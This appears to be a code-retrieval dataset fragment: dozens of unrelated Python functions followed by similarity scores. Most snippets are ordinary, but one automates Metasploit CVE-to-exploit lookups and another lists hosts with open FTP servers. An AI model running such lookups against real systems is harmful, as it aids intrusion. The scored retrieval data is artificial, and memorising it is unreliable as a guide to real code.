allRpms.union(stream.get_rpm_artifacts())\n\n return list(allRpms.difference(enabledRpms))", "def scrape_issues(self, url):\n try:\n self.driver.get(url)\n except common.exceptions.InvalidSessionIdException:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n except Exception:\n self.driver.close()\n error_message = \"ERROR: Failed to reach URL, check \"\\\n \"specified URL in constants.py\\n\"\n self.logger.log(error_message)\n return []\n\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n buganizer_issues = []\n\n if \"Buganizer\" not in page_title or \"componentid\" not in page_title:\n if \"MOMA Single Sign On\" in page_title:\n error_message = \"ERROR: You must log into your MOMA account \"\\\n \"first. 
Select the 'Use Security Code' option and generate a security code at go/sc.\\n\"\n self.logger.log(error_message)\n\n while \"Buganizer\" not in page_title:\n source_html = self.driver.page_source\n soup = BeautifulSoup(source_html, \"html.parser\")\n page_title = soup.title.string\n time.sleep(1)\n\n return buganizer_issues\n error_message = \"ERROR: URL does not link to a Buganizer \"\\\n \"componentid, check specified URL \"\\\n \"in constants.py\\n\"\n self.logger.log(error_message)\n return buganizer_issues\n\n for tbody in soup.find_all('tbody'):\n for _tr in tbody.find_all('tr'):\n issue_link = \"https://b.corp.google.com/issues/\" + _tr.get(\n 'data-row-id')\n buganizer_issues.append(issue_link)\n return buganizer_issues", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def allUnresolved(request, page=1):\n objects = im.Issue.objects.filter(resolved_state__isnull=True).reverse()\n \n \n args = utils.generatePageList(request, objects, page)\n args['issues'] = args['objects']\n \n args['no_results'] = args['page'].object_list.count() < 1\n\n return render_to_response(\"issue_list.html\", args,\n context_instance=RequestContext(request))", "def get_items_not_in_stock():\n try:\n return get_items_arent_on_stock(), 200\n except:\n return \"An error ocurred\", 404", "def excluded_from_scan(self):\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'spider/view/excludedFromScan/')))", "def get_issues(): # pragma: no cover\n global issue_data\n team = {\n 'stevex196x': 0,\n 'TheSchaft': 0,\n 'melxtru': 0,\n 'aylish19': 0,\n 'connormlewis': 0,\n 'tsukkisuki': 0\n }\n all_issues = 0\n while all_issues == 0:\n url = ('https://api.github.com/repos/connormlewis/idb/'\n 'issues?state=all&filter=all&per_page=100')\n data = requests.get(\n url, headers={'Authorization': 'token ' + os.environ['API_TOKEN']})\n link = data.headers.get('Link', None)\n for i in range(1, int(find_last_page(link)) + 1):\n url = (\n 'https://api.github.com/repos/connormlewis/idb/'\n 'issues?state=all&filter=all&per_page=100' + '&page=' + str(i))\n data = requests.get(\n url,\n headers={'Authorization': 'token ' + os.environ['API_TOKEN']})\n json_list = data.json()\n for entry in json_list:\n if 'pull_request' not in entry:\n all_issues += 1\n if entry['user']['login'] in team:\n team[entry['user']['login']] += 1\n return team, all_issues", "async def get_unused(self, join_partitions):\n all_disks = await self.middleware.call('disk.query')\n\n serial_to_disk = defaultdict(list)\n for disk in all_disks:\n serial_to_disk[(disk['serial'], disk['lunid'])].append(disk)\n\n reserved = await self.middleware.call('disk.get_reserved')\n disks = [disk for disk in all_disks if disk['devname'] not in reserved]\n\n for disk in disks:\n disk['duplicate_serial'] = [\n d['devname']\n for d in serial_to_disk[(disk['serial'], disk['lunid'])]\n if d['devname'] != disk['devname']\n ]\n\n if join_partitions:\n for disk in disks:\n disk['partitions'] = await 
self.middleware.call('disk.list_partitions', disk['devname'])\n\n return disks", "def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors", "def get_low_use_instances(self):\n return self.low_use.batch_get_item(EmailSent=True)", "def get_vulnerable_items(self):\n\n results = []\n\n for action in self.__actions:\n if self.__driver.stopping:\n break\n\n items = action.get_action_items(self.__queue_item)\n\n for item in items:\n if self.__driver.stopping:\n break\n\n if item.get_hash() in self.scanned_hashes:\n continue\n\n self.scanned_hashes.append(item.get_hash())\n\n if self.__is_item_vulnerable(item):\n results.append(item)\n\n return results", "def _filter_return_errors(self, url, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n for entry in har[\"log\"][\"entries\"]:\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n if url in entry[\"request\"][\"url\"] and temp not in matches and entry[\"response\"][\"status\"] >= 400:\r\n print \"\\nRequest failed w/ \" + str(entry[\"response\"][\"status\"]) + \" error:\\n\" + entry[\"request\"][\"url\"]\r\n if entry[\"response\"][\"content\"].get(\"text\"):\r\n print \"RESPONSE: \" + str(entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore'))\r\n temp = entry[\"request\"][\"url\"].encode('ascii', 'ignore')\r\n matches.append(temp)\r\n return matches", "async def delete_expired_responses(self):\n logger.info(f'Deleting all responses more than {self.expire_after} hours old')\n keys_to_delete = set()\n\n for key in await self.responses.keys():\n response = await self.get_response(key)\n if response and response.is_expired:\n keys_to_delete.add(key)\n\n logger.info(f'Deleting {len(keys_to_delete)} expired cache entries')\n for key in keys_to_delete:\n await self.delete(key)", "def remove_expired(self):\n now = time.time()\n return [self.remove_if_expired(key, now) for key in self._request_sessions.keys()[:]].count(True)", "def _computeunstableset(repo):\n # revset is not efficient enough here\n # we do (obsolete()::) - obsolete() by hand\n obs = getrevs(repo, 'obsolete')\n if not obs:\n return set()\n cl = repo.changelog\n return set(r for r in cl.descendants(obs) if r not in obs)", "def get_all_incomplete_exp_ids(user_id):\n incomplete_activities_model = (\n user_models.IncompleteActivitiesModel.get(\n user_id, strict=False))\n\n if incomplete_activities_model:\n incomplete_activities = get_incomplete_activities_from_model(\n incomplete_activities_model)\n\n return incomplete_activities.exploration_ids\n else:\n return []", "def get_bad_words(bad_words_url):\n r = requests.get(bad_words_url)\n\n if r.status_code != 200:\n raise requests.RequestException\n\n bad_words = r.text.strip().split(\"\\n\")\n return bad_words", "async def test_nr_of_missing_metrics_without_reports(self):\n self.set_source_parameter(\"reports\", [])\n response = await self.collect(get_request_json_side_effect=[self.data_model, self.reports])\n self.assert_measurement(\n response,\n value=str(len(self.entities)),\n total=self.expected_software_metrics,\n entities=self.entities,\n )", "def get_malware_used_by_groups():\n global malware_used_by_groups\n\n if not malware_used_by_groups:\n malware_used_by_groups = rsh.malware_used_by_groups(get_srcs())\n\n return malware_used_by_groups", "def getMissingIds(self):\n return 
self._missingIds", "def gettotal(self, response):\n url = 'http://www.ppdai.com/blacklist/'\n years = xrange(2008,2016)\n urls = [url+str(year) for year in years]\n for url in urls:\n # print url, \"year url\"\n yield Request(url, callback=self.extract, dont_filter=True)", "def get_usages(self):\n return self.client._perform_json(\"GET\", \"/projects/%s/managedfolders/%s/usages\" % (self.project_key, self.odb_id))", "def get_invalid_hosts(self):\n invalid_pub_key = []\n for host in self.config.get(\"hosts\"):\n if datetime.strptime(str(host.get(\"expire_date\")), \"%Y%m%d\") < datetime.now():\n invalid_pub_key.append(host.get(\"pub_key\"))\n return invalid_pub_key", "def allBroken(request, page=1):\n objects = im.Issue.objects.filter(resolved_state__isnull=True)\n args = utils.generatePageList(request, objects, page)\n args['issues'] = args['objects']\n issues_list = {'Issues on Unusable Machines':[]}\n for issue in args['issues']:\n iss_id = issue.item.item_id\n machine = mac.Item.objects.get(item_id=iss_id)\n\n if machine.unusable:\n issues_list['Issues on Unusable Machines'].append(issue)\n\n args['object_list'] = issues_list.items() \n args['no_results'] = args['page'].object_list.count() < 1\n return render_to_response(\"grouped_issue_list.html\", args,\n context_instance=RequestContext(request))", "def get_weak_hosts(self):\n weak = []\n try:\n for host in self.get_hosts_only():\n # Checks for the success code against each host in the dictionary\n if self.get_ftp_code(host) == 220:\n weak.append(host)\n except TypeError:\n pass\n return weak", "def issues(self):\n if self.pull_request.body is not None:\n regex = r\"(?<=closes: #|elated: #)\\d{5}\"\n issue_strs = re.findall(regex, self.pull_request.body)\n self.issue_nums = [eval(s) for s in issue_strs]", "def list(self):\n path = \"authSettings/exemptedUrls\"\n return self._session.get(path)", "def sitetotalrequests(self) :\n\t\ttry :\n\t\t\treturn self._sitetotalrequests\n\t\texcept Exception as e:\n\t\t\traise e", "def clear_expired_exceptions():\n print(\"Clearing out exceptions that have an expired TTL...\")\n clear_old_exceptions()\n print(\"Completed clearing out exceptions that have an expired TTL.\")", "def list_unique_problems(arn=None, nextToken=None):\n pass", "def getEnemyGhost(self,gameState):\r\n enemyList = []\r\n for enemy in self.getOpponents(gameState):\r\n enemyState = gameState.getAgentState(enemy)\r\n if (not enemyState.isPacman) and enemyState.scaredTimer == 0:\r\n enemyPos = gameState.getAgentPosition(enemy)\r\n if enemyPos != None:\r\n enemyList.append(enemy)\r\n return enemyList", "def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_untested(self):\n return [result for result in self.values() if result.outcome == Result.UNTESTED]", "def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n 
self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def get_misused_opt_arg_dec():\n return list(incompletely_used_decorators.values())", "def clean_stale_issues():\n from security_monkey.common.audit_issue_cleanup import clean_stale_issues\n clean_stale_issues()", "def karma_exceptions(self, server, channel, nick, params):\n return pretty_list(self.exceptions)", "def vulnerabilities(self):\n db = get_thread_scoped_session()\n known_vulnerabilities = db.query(ImagePackageVulnerability).filter(\n ImagePackageVulnerability.pkg_user_id == self.user_id,\n ImagePackageVulnerability.pkg_image_id == self.id).all()\n return known_vulnerabilities", "def get_tag_without_all_service(**kwargs):\n ix = kwargs.pop('ix')\n channel = kwargs.pop('channel')\n all_tags = set(range(1, 4097))\n\n channel_available_tags = get_free_tags(ix=ix, channel=channel)\n all_ix_used_tags = Tag.objects.filter(\n Q(status='PRODUCTION') | Q(reserved=True),\n ix=ix\n )\n\n free_tags = channel_available_tags.exclude(\n tag__in=all_ix_used_tags.values_list('tag', flat=True))\n\n if(not free_tags and len(all_ix_used_tags) <=\n MAX_TAG_NUMBER - MIN_TAG_NUMBER):\n tags_to_create = all_tags - \\\n set(all_ix_used_tags.values_list('tag', flat=True))\n tag = list(tags_to_create)[0]\n free_tags = instantiate_tag(channel=channel, ix=ix, tag_number=tag)\n free_tags = Tag.objects.filter(pk=free_tags.pk)\n\n return free_tags", "def extract_listings(page_url, attempts=10):\r\n \r\n listings_max = 0\r\n listings_out = [BeautifulSoup('', features='html.parser')]\r\n for idx in range(attempts):\r\n try:\r\n answer = requests.get(page_url, timeout=5)\r\n content = answer.content\r\n soup = BeautifulSoup(content, features='html.parser')\r\n listings = soup.findAll(\"div\", {\"class\": \"_gig1e7\"})\r\n except:\r\n # if no response - return a list with an empty soup\r\n listings = [BeautifulSoup('', features='html.parser')]\r\n\r\n if len(listings) == 20:\r\n listings_out = listings\r\n break\r\n\r\n if len(listings) >= listings_max:\r\n listings_max = len(listings)\r\n listings_out = listings\r\n\r\n return listings_out", "def stop_loss_prices(self) -> List[float]:\n return self._stop_loss_prices", "def get_all_failures(self):\n return self._get_filtered_results(success=False)", "def get_requests(url, user, passwd):\n \n #get\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n \n #if timout\n if r.status_code == 403:\n print(\"LIMIT EXCEEDED\")\n print(\"WAIT AN HOUR\")\n i=1\n while r.status_code != 200:\n time.sleep(60)\n r = requests.get(url, auth=HTTPBasicAuth(user, passwd))\n print(\"{} MINUTES ELAPSED\".format(i))\n i+=1\n elif r.status_code != 200:\n print(r.status_code)\n return []\n #return data\n data = r.json()\n return data", "def test_api_can_get_filtered_issues_list(self):\n path = '/issues/?language=python&tech_stack=django&experience_needed=moderate'\n response = self.client.get(path, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertGreater(len(api_response_issues), len(json.loads(response.content)))", "def find_delay_issues(self, msg, delay_days, unassign):\n self._asset_bind(msg)\n yield (\"Processing....\")\n trans = self._translation_util(msg)\n client = self._github_operator(msg)\n issues = find_delay_issues(trans, client, 
delay_days)\n if unassign == 0:\n yield (\"\\n\".join(limit_result([\"{}: {}, {}, {}\".format(issues[i][0].number, issues[i][0].title, issues[i][2], issues[i][3]) for i in issues])))\n else:\n success = unassign_issues(trans, issues)\n yield \"relassed {} issues that have been accepted for more than {} days\".format(success, delay_days)", "def check_for_no_privates(context):\n json_data = context.response.json()\n\n if \"component_analyses\" in json_data:\n vulnerabilities = json_data['component_analyses']['vulnerability']\n for v in vulnerabilities:\n assert \"cvss\" in v\n assert \"is_private\" in v\n assert \"vendor_cve_ids\" in v\n if v[\"is_private\"]:\n raise Exception(\"Private vulnerability found\")", "def discard_cached_summaries() -> None:\n for summary in get_all_summaries().values():\n summary.discard()", "def get_free_games(self) -> List[Game]:", "def get_possible_exploit(self):\n return 'exploit', self.exploit.run()", "def undead(self):\n cutoff = datetime.utcnow() - timedelta(seconds=HEARTBEAT_FAILED)\n return self.status_in(\"active\").filter(heartbeat__lt=cutoff)", "def resolve_vulns(self):\n for vuln in self.vulns:\n for ref in vuln.refs:\n if 'cve' in str.lower(ref):\n results = str(self.client.console_execute('search cve:{0}\\n'.format(ref))[b'data'])\n while not 'Modules' in results:\n sleep(10)\n results = self.client.console_read()\n results = results.split('\\n')\n for line in results:\n if 'exploit' in line:\n self.exploits.append(line.split(' ')[0])", "async def giveaway_remaining_list(self, ctx):\n\n remaining = self._get_remaining()\n remaining_str = '\\n'.join(remaining)\n\n await ctx.send(\n f\"{len(remaining)} remaining games:\\n\"\n f\"```\\n{remaining_str}\\n```\"\n )", "def _get_cache_tags(self):\n try:\n project = self._get_project()\n version = self._get_version()\n except Exception:\n log.warning(\n \"Error while retrieving project or version for this view.\",\n exc_info=True,\n )\n return []\n\n tags = []\n if project:\n tags.append(project.slug)\n if project and version:\n tags.append(get_cache_tag(project.slug, version.slug))\n if project and self.project_cache_tag:\n tags.append(get_cache_tag(project.slug, self.project_cache_tag))\n return tags", "def get_dead_keys(self):\n return self.dead_keys", "def likely_regressions(self):\n return set([label for label, count in self.regressions.items() if count == 0])", "def get_all_blacklisted_as_list(self):\n try:\n result = self.table.select().execute()\n if result.rowcount >= 1:\n return [x.values() for x in result]\n elif result.rowcount == 0:\n return []\n except Exception as e:\n self.log(e, self.identifier)\n raise egg_errors.QueryNotPossible", "def get_insecure_entities(self) -> list:\n return [\n entity[CONF_FRIENDLY_NAME]\n for entity in self.args[\"secure_status_mapping\"]\n if self.get_state(entity[\"entity_id\"]) == entity[CONF_STATE]\n ]", "def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)", "def unused_featurevalues():\n\n fvs = FeatureValue.objects.filter(feature__active=True)\n unused_fvs = fvs.filter(languages__isnull=True)\n natlang_only_fvs = fvs.filter(languages__language__natlang=True).exclude(languages__language__natlang=False)\n\n if not natlang_only_fvs:\n # Natlangs had no unique features so return early\n return unused_fvs\n\n # dsd\n decorate = ((fv.id, fv) for fv in set(unused_fvs) | set(natlang_only_fvs))\n sort = sorted(decorate)\n return [fv for (_, fv) in sort]", "def dead_agents(self, namespace, timeout_s=60):\n lost = []\n\n with self.lock:\n for 
agent in self.agents(namespace):\n if agent.message and datetime.utcnow().timestamp() - agent.heartbeat > timeout_s:\n lost.append(agent)\n\n return lost", "def unshorten(self, url):\n h = requests.get(url)\n stack = [i.url for i in h.history]\n stack.append(h.url)\n return stack", "def _filter_entries_by_url_response(self, url, har=None):\r\n if not har:\r\n har = self.har\r\n \r\n matches = []\r\n if len(har[\"log\"][\"entries\"]) > 1:\r\n for entry in har[\"log\"][\"entries\"]:\r\n if url in entry[\"request\"][\"url\"]:\r\n if entry[\"response\"][\"status\"] == 200 and entry[\"response\"][\"content\"].get(\"text\") and entry[\"response\"][\"content\"][\"text\"] != \"\":\r\n temp = entry[\"response\"][\"content\"][\"text\"].encode('ascii', 'ignore')\r\n matches.append(temp)\r\n return matches", "def get_not_meals():\n\n not_meals = DailyMenuRating.objects.filter(is_meal=False).prefetch_related('daily_menu').all()\n tagger = RecipeTagger()\n\n tags_counted = Counter()\n for rating in not_meals:\n tags = tagger.get_static_tags(rating.daily_menu.name, include_multiple_words=False)\n\n for tag in tags:\n tags_counted[tag] += 1\n\n return tags_counted" ]
[ "0.6674417", "0.5879174", "0.573975", "0.5573522", "0.5512234", "0.5511594", "0.54789424", "0.5453956", "0.54249877", "0.5305752", "0.52119917", "0.5211895", "0.5186949", "0.5154393", "0.5097592", "0.50868165", "0.50696427", "0.4995546", "0.49941427", "0.49911252", "0.49783477", "0.49753472", "0.49482512", "0.4939018", "0.4932287", "0.4932287", "0.49266338", "0.49254662", "0.49111807", "0.49102694", "0.4890678", "0.48695132", "0.4862269", "0.4855858", "0.48490602", "0.48288843", "0.48205313", "0.48068416", "0.4767251", "0.47331738", "0.4725351", "0.4718402", "0.471802", "0.47144514", "0.46984056", "0.46968046", "0.46930245", "0.46928537", "0.46881914", "0.46831286", "0.46827945", "0.46824586", "0.46824336", "0.46812868", "0.4679676", "0.46789503", "0.46754426", "0.46698397", "0.4662698", "0.4661934", "0.46617106", "0.4655941", "0.46424165", "0.46360722", "0.46313873", "0.4629669", "0.46291634", "0.46271306", "0.46213883", "0.4620657", "0.4614988", "0.46145868", "0.46145305", "0.46053308", "0.45986938", "0.4598025", "0.45881686", "0.4580564", "0.45774087", "0.45761722", "0.4575263", "0.45712677", "0.4570383", "0.45662487", "0.45661294", "0.4563072", "0.45584482", "0.45551443", "0.455508", "0.45542282", "0.45512787", "0.45484075", "0.45412073", "0.453986", "0.45340055", "0.45303234", "0.45269573", "0.45262474", "0.4526122", "0.45223355" ]
0.7982038
0
fetcher.get_explore_fields() should return an explore's fields.
def test_get_explore_fields_gets_fields(
    fc: fetcher.Fetcher, test_model, test_explores_stats
):
    test_explore = test_explores_stats[0]
    explore = fc.get_explores(model=test_model["name"], explore=test_explore["name"])
    assert isinstance(explore, list)
    explore = explore[0]
    assert isinstance(explore, models.LookmlModelExplore)
    assert explore.model_name == test_model["name"]
    assert explore.name == test_explore["name"]
    fields = fc.get_explore_fields(explore)
    assert isinstance(fields, list)
    assert fields == test_explore["all_fields"]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def fields(self):\n ...", "def fields(request):\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response", "def fieldsUrl(self):\n return self.lweBaseUrl + \\\n \"/collections/\" + self.collectionName + \\\n \"/fields\"", "def get_query_fields(cls):\n ...", "def fields(self):", "def get_fields(self, pager=None):\n return Field.deserialize_list(self._get_multiple('fields', {}, pager))", "def listFields(self):\n return self.get_json('/field')", "def _get_fields(self):\n return self._fields", "def request_fields(self, fields=None):\n # The cursor only works for the 'search' endpoint, just call\n # the 'field' endpoint and return all the field types\n response = self.connection.get_request(self.uri_field)\n if response.status_code != requests.codes.ok:\n logger.warning('JIRA Cloud returned %d for %s', response.status_code, self.uri_field)\n return []\n content = json.loads(response.content)\n # Overwrite some fields\n for c in content:\n if c['name'] == 'Epic Status':\n c['schema']['type'] = 'string'\n c['choices'] = (('To Do', 'To Do'), ('In Progress', 'In Progress'), ('Done', 'Done'))\n elif c['name'] == 'Resolution':\n c['choices'] = self._get_resolutions()\n\n # The KEY field is never returned\n c 
= {\n \"id\": \"key\",\n \"key\": \"key\",\n \"name\": \"Key\",\n \"custom\": False,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"key\",\n ],\n \"schema\": {\n \"type\": \"string\",\n }\n }\n content.append(c)\n # The parent field is never returned\n c = {\n \"id\": \"parent\",\n \"key\": \"parent\",\n \"name\": \"Parent\",\n \"custom\": True,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"parent\",\n ],\n \"schema\": {\n \"type\": \"any\",\n \"custom\": \"com.django-atlassian:parent\"\n }\n }\n content.append(c)\n return content", "def get_fields(self):\r\n return self.fields", "def fields(self):\r\n pass", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def pull_fields(self, org):\n pass", "def Fields(self):\n return self._fields", "def read_fields(self, limit = 0, collapse = False):\r\n\r\n keys = []\r\n probes = {}\r\n\r\n def probe_record(record, parent = None):\r\n for key, value in record.items():\r\n full_key = parent + \".\" + key if parent else key\r\n\r\n if self.expand and type(value) == dict:\r\n probe_record(value, full_key)\r\n continue\r\n\r\n if not full_key in probes:\r\n probe = brewery.dq.FieldTypeProbe(full_key)\r\n probes[full_key] = probe\r\n keys.append(full_key)\r\n else:\r\n probe = probes[full_key]\r\n probe.probe(value)\r\n\r\n count = 0\r\n for record in self.records():\r\n if collapse:\r\n record = collapse_record(record)\r\n\r\n probe_record(record)\r\n if limit and count >= limit:\r\n break\r\n count += 1\r\n\r\n fields = []\r\n\r\n for key in keys:\r\n probe = probes[key]\r\n field = Field(probe.field)\r\n\r\n storage_type = probe.unique_storage_type\r\n if not storage_type:\r\n field.storage_type = \"unknown\"\r\n elif storage_type == \"unicode\":\r\n field.storage_type = \"string\"\r\n else:\r\n field.storage_type = \"unknown\"\r\n field.concrete_storage_type = storage_type\r\n\r\n # FIXME: Set analytical type\r\n\r\n fields.append(field)\r\n\r\n self.fields = list(fields)\r\n return self.fields", "def get_fields(self, path):\n with self.inspector(path) as opened_file:\n return opened_file.describe_fields()", "def get_fields(self, key=None):\n return self._get_query('fields', self._build_params(key=key), Field)", "def get_fields(self):\n return self.fields", "def get_fields(self):\n return self.fields", "def get_fields_list(self):\n return self.description[\"fields\"][\"values\"].keys()", "def test_get_featured_front_page_returns_required_fields(self):\r\n\r\n app = self.create_app(None)\r\n app.owner = self.user\r\n db.session.add(app)\r\n featured = Featured(app=app)\r\n db.session.add(featured)\r\n db.session.commit()\r\n fields = ('id', 'name', 'short_name', 'info', 'n_volunteers', 'n_completed_tasks')\r\n\r\n featured = cached_apps.get_featured_front_page()[0]\r\n\r\n for field in fields:\r\n assert 
featured.has_key(field), \"%s not in app info\" % field", "def _commercial_fields(self):\n return ['website']", "def _select_fields(self):\r\n return []", "def f(self):\r\n return self.fields()", "def readAccessedFields(self):\n pass", "def fields(request):\n # Only recognizes a few fields for now.\n if request.method != 'POST':\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response\n\n if not request.issue.edit_allowed:\n if not IS_DEV:\n return HttpTextResponse('Login required', status=401)\n fields = json.loads(request.POST.get('fields'))\n issue = request.issue\n if 'description' in fields:\n issue.description = fields['description']\n if 'reviewers' in fields:\n issue.reviewers = _get_emails_from_raw(fields['reviewers'])\n issue.calculate_updates_for()\n if 'subject' in fields:\n issue.subject = fields['subject']\n issue.put()\n return HttpTextResponse('')", "def QueryFields(self, what, fields=None, reason=None):\n query = []\n _AppendReason(query, reason)\n\n if fields is not None:\n _AppendIf(query, True, (\"fields\", \",\".join(fields)))\n\n return self._SendRequest(HTTP_GET,\n (\"/%s/query/%s/fields\" %\n (GANETI_RAPI_VERSION, what)), query, None)", "def test_max_features_paged(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(return_fields=['pkey_boring'], max_features=15)\n assert len(df) == 15", "def get_fields(self):\n\n\t\treturn self.__fields", "def _get_fields(self):\n if not self._cursor.description:\n return {}\n\n results = {}\n column = 0\n\n for des in self._cursor.description:\n fieldname = des[0]\n results[column] = fieldname\n column = column + 1\n\n return results", "def test_query_api_result_fields():\n # Pick the first result and test for all fields\n result = query_api(url, \"test\")[0]\n assert all(field in result.keys() for field in fields)", "def get_fields(model, fields=None):\n include = [f.strip() for f in fields.split(',')] if fields else None\n return utils.get_fields(\n model,\n include\n )", "def _retrieve_fields(self, scope, fields):\r\n if scope == Scope.user_state:\r\n return self._chunked_query(\r\n StudentModule,\r\n 'module_state_key__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n course_id=self.course_id,\r\n student=self.user.pk,\r\n )\r\n elif scope == Scope.user_state_summary:\r\n return self._chunked_query(\r\n XModuleUserStateSummaryField,\r\n 'usage_id__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.preferences:\r\n return self._chunked_query(\r\n XModuleStudentPrefsField,\r\n 'module_type__in',\r\n set(descriptor.scope_ids.block_type for descriptor in self.descriptors),\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.user_info:\r\n return self._query(\r\n XModuleStudentInfoField,\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n else:\r\n return []", "def fields(self) -> List[Field]: # pragma: no cover\n pass", "def get_fields():\n if not request.is_xhr:\n abort(403)\n fields = Field.query.all()\n result = {field.id:field.name for 
